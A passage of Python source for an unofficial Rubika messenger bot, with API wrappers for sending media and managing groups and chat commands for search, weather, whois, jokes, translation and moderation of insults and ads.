thumb_inline , width , height, text=None, message_id=None): if text == None: if message_id == None: t = False while t == False: try: p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Image", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'thumb_inline':thumb_inline, 'width':width, 'height':height } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) t = True except: t = False return p else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Image", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'thumb_inline':thumb_inline, 'width':width, 'height':height } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: if message_id == None: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Image", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'thumb_inline':thumb_inline, 'width':width, 'height':height } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", 
"package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Image", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'thumb_inline':thumb_inline, 'width':width, 'height':height } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) def sendVoice(self, chat_id, file_id , mime , dc_id, access_hash_rec, file_name, size, duration, text=None, message_id=None): if text == None: if message_id == None: t = False while t == False: try: p = loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Voice", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'time':duration, } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) t = True except: t = False return p else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Voice", "file_name":file_name, "size":size, "mime":mime, 
"access_hash_rec":access_hash_rec, 'time':duration, } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: if message_id == None: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Voice", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'time':duration, } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) else: return loads(self.enc.decrypt(loads(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"sendMessage", "input":{ "object_guid":chat_id, "rnd":f"{randint(100000,900000)}", "text":text, "reply_to_message_id":message_id, "file_inline":{ "dc_id":str(dc_id), "file_id":str(file_id), "type":"Voice", "file_name":file_name, "size":size, "mime":mime, "access_hash_rec":access_hash_rec, 'time':duration, } }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c17.iranlms.ir/").text)['data_enc'])) def getUserInfo(self, chat_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getUserInfo", "input":{ "user_guid":chat_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c37.iranlms.ir/").json()["data_enc"])) def getMessages(self, chat_id,min_id): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": 
self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesInterval", "input":{ "object_guid":chat_id, "middle_message_id":min_id }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data").get("messages") def getInfoByUsername(self, username): ''' username should be without @ ''' return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getObjectByUsername", "input":{ "username":username }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c23.iranlms.ir/").json().get("data_enc"))) def banGroupMember(self, chat_id, user_id): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"banGroupMember", "input":{ "group_guid": chat_id, "member_guid": user_id, "action":"Set" }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c21.iranlms.ir/") def invite(self, chat_id, user_ids): return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"addGroupMembers", "input":{ "group_guid": chat_id, "member_guids": user_ids }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c22.iranlms.ir/") def getGroupAdmins(self, chat_id): t = False while t == False: try: p = post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "client":{ "app_name":"Main", "app_version":"2.9.5", "lang_code":"fa", "package":"ir.resaneh1.iptv", "platform":"Android" }, "input":{ "group_guid":chat_id }, "method":"getGroupAdminMembers" }))},url="https://messengerg2c22.iranlms.ir/") p = 
loads(self.enc.decrypt(p.json().get("data_enc"))) t = True except: t = False return p def getMessagesInfo(self, chat_id, message_ids): return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesByID", "input":{ "object_guid": chat_id, "message_ids": message_ids }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))}, url="https://messengerg2c24.iranlms.ir/").json()["data_enc"])).get("data").get("messages") def setMembersAccess(self, chat_id, access_list): return post(json={ "api_version": "4", "auth": self.auth, "client": { "app_name": "Main", "app_version": "2.9.5", "lang_code": "fa", "package": "ir.resaneh1.iptv", "platform": "Android" }, "data_enc": self.enc.encrypt(dumps({ "access_list": access_list, "group_guid": chat_id })), "method": "setGroupDefaultAccess" }, url="https://messengerg2c24.iranlms.ir/") def getGroupInfo(self, chat_id): return loads(self.enc.decrypt(post( json={ "api_version":"5", "auth": self.auth, "data_enc": self.enc.encrypt(dumps({ "method":"getGroupInfo", "input":{ "group_guid": chat_id, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))}, url="https://messengerg2c24.iranlms.ir/").json()["data_enc"])) def get_updates_all_chats(self): t = False while t == False: try: time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) p = post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getChatsUpdates", "input":{ "state":time_stamp, }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c67.iranlms.ir/") p = loads(self.enc.decrypt(p.json().get("data_enc"))).get("data").get("chats") t = True except: t = False return p def get_updates_chat(self, chat_id): time_stamp = 
str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMessagesUpdates", "input":{ "object_guid":chat_id, "state":time_stamp }, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data").get("updated_messages") def my_sticker_set(self): time_stamp = str(random._floor(datetime.datetime.today().timestamp()) - 200) return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({ "method":"getMyStickerSets", "input":{}, "client":{ "app_name":"Main", "app_version":"3.2.1", "platform":"Web", "package":"web.rubika.ir", "lang_code":"fa" } }))},url="https://messengerg2c67.iranlms.ir/").json().get("data_enc"))).get("data") def getThumbInline(self,image_bytes:bytes): im = Image.open(io.BytesIO(image_bytes)) width, height = im.size if height > width: new_height = 40 new_width = round(new_height * width / height) else: new_width = 40 new_height = round(new_width * height / width) im = im.resize((new_width, new_height), Image.ANTIALIAS) changed_image = io.BytesIO() im.save(changed_image, format='PNG') changed_image = changed_image.getvalue() return base64.b64encode(changed_image) def getImageSize(self,image_bytes:bytes): im = Image.open(io.BytesIO(image_bytes)) width, height = im.size return width , height def hex_to_rgb(self,value): value = value.lstrip('#') lv = len(value) return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3)) def write_text_image(self,text:str,bc_color:str='yellow',size:int=40,color='#3d3d3d',x=50,y=100): try: file_name = 'image/'+ bc_color +'.jpg' image = Image.open(file_name) size = int(size) font = ImageFont.truetype('Vazir-Regular.ttf', size, encoding='unic') draw = ImageDraw.Draw(image) reshaped_text = 
arabic_reshaper.reshape(text) # correct its shape changed_image = io.BytesIO() if color.startswith('#') and len(color) < 8: color = self.hex_to_rgb(color) draw.text((x, y), reshaped_text,color, font = font) image.save(changed_image, format='PNG') changed_image = changed_image.getvalue() return changed_image elif color.startswith('(') and len(color) < 14 and color.count(',') == 2: color = color.replace('(', '').replace(')', '') list_c = color.split(',') list_c2 = [] for i in list_c: list_c2.append(int(i)) color = tuple(list_c2) draw.text((x, y), bidi_text,color, font = font) image.save(changed_image, format='PNG') changed_image = changed_image.getvalue() return changed_image else: return 'err' except: return 'err' def hasInsult(msg): swData = [False,None] for i in open("dontReadMe.txt").read().split("\n"): if i in msg: swData = [True, i] break else: continue return swData def hasAds(msg): links = list(map(lambda ID: ID.strip()[1:],findall("@[\w|_|\d]+", msg))) + list(map(lambda link:link.split("/")[-1],findall("rubika\.ir/\w+",msg))) joincORjoing = "joing" in msg or "joinc" in msg if joincORjoing: return joincORjoing else: for link in links: try: Type = bot.getInfoByUsername(link)["data"]["chat"]["abs_object"]["type"] if Type == "Channel": return True except KeyError: return False def search_i(text,chat,bot): try: search = text[11:-1] if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به زودی به پیوی شما ارسال میشوند', chat['last_message']['message_id']) jd = json.loads(requests.get('https://zarebin.ir/api/image/?q=' + search + '&chips=&page=1').text) jd = jd['results'] a = 0 for j in jd: if a <= 8: try: res = requests.get(j['image_link']) if res.status_code == 200 and res.content != b'' and j['cdn_thumbnail'] != '': thumb = str(j['cdn_thumbnail']) thumb = thumb.split('data:image/')[1] thumb = thumb.split(';')[0] if thumb == 'png': b2 = res.content width, height = bot.getImageSize(b2) tx = 
bot.requestFile(j['title'] + '.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, j['title'] + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title']) print('sended file') elif thumb == 'webp': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.webp', len(b2), 'webp') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'webp', tx['dc_id'] , access, j['title'] + '.webp', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title']) print('sended file') else: b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.jpg', len(b2), 'jpg') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['last_message']['author_object_guid'] ,tx['id'] , 'jpg', tx['dc_id'] , access, j['title'] + '.jpg', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title']) print('sended file') a += 1 except: print('image error') else: break elif chat['abs_object']['type'] == 'User': bot.sendMessage(chat['object_guid'], 'در حال یافتن کمی صبور باشید...', chat['last_message']['message_id']) print('search image') jd = json.loads(requests.get('https://zarebin.ir/api/image/?q=' + search + '&chips=&page=1').text) jd = jd['results'] a = 0 for j in jd: if a < 10: try: res = requests.get(j['image_link']) if res.status_code == 200 and res.content != b'' and j['cdn_thumbnail'] != '' and j['cdn_thumbnail'].startswith('data:image'): thumb = str(j['cdn_thumbnail']) thumb = thumb.split('data:image/')[1] thumb = thumb.split(';')[0] if thumb == 'png': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.png', len(b2), 'png') access = bot.fileUpload(b2, 
tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, j['title'] + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id']) print('sended file') elif thumb == 'webp': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile(j['title'] + '.webp', len(b2), 'webp') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['object_guid'] ,tx['id'] , 'webp', tx['dc_id'] , access, j['title'] + '.webp', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id']) print('sended file') else: b2 = res.content tx = bot.requestFile(j['title'] + '.jpg', len(b2), 'jpg') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) width, height = bot.getImageSize(b2) bot.sendImage(chat['object_guid'] ,tx['id'] , 'jpg', tx['dc_id'] , access, j['title'] + '.jpg', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, j['title'], chat['last_message']['message_id']) print('sended file') a += 1 except: print('image erorr') return True except: print('image search err') return False def write_image(text,chat,bot): try: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if 'text' in msg_data.keys() and msg_data['text'].strip() != '': txt_xt = msg_data['text'] paramiters = text[8:-1] paramiters = paramiters.split(':') if len(paramiters) == 5: b2 = bot.write_text_image(txt_xt,paramiters[0],int(paramiters[1]),str(paramiters[2]),int(paramiters[3]),int(paramiters[4])) tx = bot.requestFile('code_image.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) width, height = 
bot.getImageSize(b2) bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'code_image.png', len(b2) , str(bot.getThumbInline(b2))[2:-1] , width, height ,message_id= c_id) print('sended file') return True return False except: print('server ban bug') return False def uesr_remove(text,chat,bot): try: admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]] if chat['last_message']['author_object_guid'] in admins: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if not msg_data['author_object_guid'] in admins: bot.banGroupMember(chat['object_guid'], msg_data['author_object_guid']) bot.sendMessage(chat['object_guid'], 'انجام شد' , chat['last_message']['message_id']) return True return False except: print('server ban bug') return False def speak_after(text,chat,bot): try: c_id = chat['last_message']['message_id'] msg_data = bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if 'text' in msg_data.keys() and msg_data['text'].strip() != '': txt_xt = msg_data['text'] speech = gTTS(txt_xt) changed_voice = io.BytesIO() speech.write_to_fp(changed_voice) b2 = changed_voice.getvalue() tx = bot.requestFile('sound.ogg', len(b2), 'sound.ogg') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) f = io.BytesIO() f.write(b2) f.seek(0) audio = MP3(f) dur = audio.info.length bot.sendVoice(chat['object_guid'],tx['id'] , 'ogg', tx['dc_id'] , access, 'sound.ogg', len(b2), dur * 1000 ,message_id= c_id) print('sended voice') return True return False except: print('server gtts bug') return False def joker(text,chat,bot): try: jd = 
requests.get('https://api.codebazan.ir/jok/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) return True except: print('code bz server err') return False def info_qroz(text,chat,bot): try: user_info = bot.getInfoByUsername(text[7:]) if user_info['data']['exist'] == True: if user_info['data']['type'] == 'User': bot.sendMessage(chat['object_guid'], 'name:\n ' + user_info['data']['user']['first_name'] + ' ' + user_info['data']['user']['last_name'] + '\n\nbio:\n ' + user_info['data']['user']['bio'] + '\n\nguid:\n ' + user_info['data']['user']['user_guid'] , chat['last_message']['message_id']) print('sended response') else: bot.sendMessage(chat['object_guid'], 'کانال است' , chat['last_message']['message_id']) print('sended response') else: bot.sendMessage(chat['object_guid'], 'وجود ندارد' , chat['last_message']['message_id']) print('sended response') return True except: print('server bug6') return False def search(text,chat,bot): try: search = text[9:-1] if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'] text = '' for result in results: text += result['title'] + '\n\n' bot.sendMessage(chat['object_guid'], 'نتایج به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'] text = '' for result in results: text += result['title'] + '\n\n' bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) return True except: print('search zarebin err') bot.sendMessage(chat['object_guid'], 'در حال حاضر این دستور محدود یا در حال تعمیر است' , chat['last_message']['message_id']) return False def 
p_danesh(text,chat,bot): try: res = requests.get('http://api.codebazan.ir/danestani/pic/') if res.status_code == 200 and res.content != b'': b2 = res.content width, height = bot.getImageSize(b2) tx = bot.requestFile('jok_'+ str(random.randint(1000000, 9999999)) + '.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'jok_'+ str(random.randint(1000000, 9999999)) + '.png', len(b2), str(bot.getThumbInline(b2))[2:-1] , width, height, message_id=chat['last_message']['message_id']) print('sended file') return True except: print('code bz danesh api bug') return False def anti_insult(text,chat,bot): try: admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]] if not chat['last_message']['author_object_guid'] in admins: print('yek ahmagh fohsh dad: ' + chat['last_message']['author_object_guid']) bot.deleteMessages(chat['object_guid'], [chat['last_message']['message_id']]) return True return False except: print('delete the fohsh err') def anti_tabligh(text,chat,bot): try: admins = [i["member_guid"] for i in bot.getGroupAdmins(chat['object_guid'])["data"]["in_chat_members"]] if not chat['last_message']['author_object_guid'] in admins: print('yek ahmagh tabligh kard: ' + chat['last_message']['author_object_guid']) bot.deleteMessages(chat['object_guid'], [chat['last_message']['message_id']]) return True return False except: print('tabligh delete err') def get_curruncy(text,chat,bot): try: t = json.loads(requests.get('https://api.codebazan.ir/arz/?type=arz').text) text = '' for i in t: price = i['price'].replace(',','')[:-1] + ' تومان' text += i['name'] + ' : ' + price + '\n' bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) except: print('code bz arz err') return True def shot_image(text,chat,bot): try: c_id = chat['last_message']['message_id'] msg_data = 
bot.getMessagesInfo(chat['object_guid'], [c_id]) msg_data = msg_data[0] if 'reply_to_message_id' in msg_data.keys(): msg_data = bot.getMessagesInfo(chat['object_guid'], [msg_data['reply_to_message_id']])[0] if 'text' in msg_data.keys() and msg_data['text'].strip() != '': txt_xt = msg_data['text'] res = requests.get('https://api.otherapi.tk/carbon?type=create&code=' + txt_xt + '&theme=vscode') if res.status_code == 200 and res.content != b'': b2 = res.content tx = bot.requestFile('code_image.png', len(b2), 'png') access = bot.fileUpload(b2, tx['access_hash_send'], tx['id'], tx['upload_url']) width, height = bot.getImageSize(b2) bot.sendImage(chat['object_guid'] ,tx['id'] , 'png', tx['dc_id'] , access, 'code_image.png', len(b2) , str(bot.getThumbInline(b2))[2:-1] , width, height ,message_id= c_id) print('sended file') except: print('code bz shot err') return True def get_ip(text,chat,bot): try: ip = text[5:-1] if hasInsult(ip)[0] == False: jd = json.loads(requests.get('https://api.codebazan.ir/ipinfo/?ip=' + ip).text) text = 'نام شرکت:\n' + jd['company'] + '\n\nکشور : \n' + jd['country_name'] + '\n\nارائه دهنده : ' + jd['isp'] bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz ip err') return True def get_weather(text,chat,bot): try: city = text[10:-1] if hasInsult(city)[0] == False: jd = json.loads(requests.get('https://api.codebazan.ir/weather/?city=' + city).text) text = 'دما : \n'+jd['result']['دما'] + '\n سرعت باد:\n' + jd['result']['سرعت باد'] + '\n وضعیت هوا: \n' + jd['result']['وضعیت هوا'] + '\n\n بروز رسانی اطلاعات امروز: ' + jd['result']['به روز رسانی'] + '\n\nپیش بینی هوا فردا: \n دما: ' + jd['فردا']['دما'] + '\n وضعیت هوا : ' + jd['فردا']['وضعیت هوا'] bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz weather err') return True def get_whois(text,chat,bot): try: site = text[8:-1] jd = 
json.loads(requests.get('https://api.codebazan.ir/whois/index.php?type=json&domain=' + site).text) text = 'مالک : \n'+jd['owner'] + '\n\n آیپی:\n' + jd['ip'] + '\n\nآدرس مالک : \n' + jd['address'] + '\n\ndns1 : \n' + jd['dns']['1'] + '\ndns2 : \n' + jd['dns']['2'] bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz whois err') return True def get_font(text,chat,bot): try: name_user = text[7:-1] jd = json.loads(requests.get('https://api.codebazan.ir/font/?text=' + name_user).text) jd = jd['result'] text = '' for i in range(1,100): text += jd[str(i)] + '\n' if hasInsult(name_user)[0] == False and chat['abs_object']['type'] == 'Group': bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + name_user + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz font err') return True def get_ping(text,chat,bot): try: site = text[7:-1] jd = requests.get('https://api.codebazan.ir/ping/?url=' + site).text text = str(jd) bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('code bz ping err') return True def get_gold(text,chat,bot): try: r = json.loads(requests.get('https://www.wirexteam.ga/gold').text) change = str(r['data']['last_update']) r = r['gold'] text = '' for o in r: text += o['name'] + ' : ' + o['nerkh_feli'] + '\n' text += '\n\nآخرین تغییر : ' + change bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('gold server err') return True def get_wiki(text,chat,bot): try: t = text[7:-1] t = t.split(':') mozoa = '' t2 = '' page = int(t[0]) for i in range(1,len(t)): t2 += t[i] mozoa = t2 if hasInsult(mozoa)[0] == False and chat['abs_object']['type'] == 'Group' and page > 0: text_t = 
requests.get('https://api.codebazan.ir/wiki/?search=' + mozoa).text if not 'codebazan.ir' in text_t: CLEANR = re.compile('<.*?>') def cleanhtml(raw_html): cleantext = re.sub(CLEANR, '', raw_html) return cleantext text_t = cleanhtml(text_t) n = 4200 text_t = text_t.strip() max_t = page * n min_t = max_t - n text = text_t[min_t:max_t] bot.sendMessage(chat['object_guid'], 'مقاله "'+ mozoa + '" صفحه : ' + str(page) + ' به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + mozoa + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User' and page > 0: text_t = requests.get('https://api.codebazan.ir/wiki/?search=' + mozoa).text if not 'codebazan.ir' in text_t: CLEANR = re.compile('<.*?>') def cleanhtml(raw_html): cleantext = re.sub(CLEANR, '', raw_html) return cleantext text_t = cleanhtml(text_t) n = 4200 text_t = text_t.strip() max_t = page * n min_t = max_t - n text = text_t[min_t:max_t] bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) except: print('code bz wiki err') return True def get_pa_na_pa(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/jok/pa-na-pa/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz pa na pa err') return True def get_dastan(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/dastan/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz dastan err') return True def get_search_k(text,chat,bot): try: search = text[11:-1] if hasInsult(search)[0] == False and chat['abs_object']['type'] == 'Group': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'] text = '' for result in results: text += result['title'] + ':\n\n ' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', 
'').replace('&quot;', '').replace(' — ', '').replace(' AP', '') + '\n\n' bot.sendMessage(chat['object_guid'], 'نتایج کامل به پیوی شما ارسال شد', chat['last_message']['message_id']) bot.sendMessage(chat['last_message']['author_object_guid'], 'نتایج یافت شده برای (' + search + ') : \n\n'+text) elif chat['abs_object']['type'] == 'User': jd = json.loads(requests.get('https://zarebin.ir/api/?q=' + search + '&page=1&limit=10').text) results = jd['results']['webs'] text = '' for result in results: text += result['title'] + ':\n\n ' + str(result['description']).replace('</em>', '').replace('<em>', '').replace('(Meta Search Engine)', '').replace('&quot;', '').replace(' — ', '').replace(' AP', '') + '\n\n' bot.sendMessage(chat['object_guid'], text , chat['last_message']['message_id']) except: print('zarebin search err') return True def get_bio(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/bio/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz bio err') return True def get_trans(text,chat,bot): try: t = text[8:-1] t = t.split(':') lang = t[0] t2 = '' for i in range(1,len(t)): t2 += t[i] text_trans = t2 if hasInsult(text_trans)[0] == False: t = Translator() text = t.translate(text_trans,lang).text bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) elif chat['abs_object']['type'] == 'User': t = Translator() text = t.translate(text_trans,lang).text bot.sendMessage(chat['object_guid'], text, chat['last_message']['message_id']) except: print('google trans err') return True def get_khatere(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/jok/khatere/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: print('code bz khatere err') return True def get_danesh(text,chat,bot): try: jd = requests.get('https://api.codebazan.ir/danestani/').text bot.sendMessage(chat['object_guid'], jd, chat['last_message']['message_id']) except: 
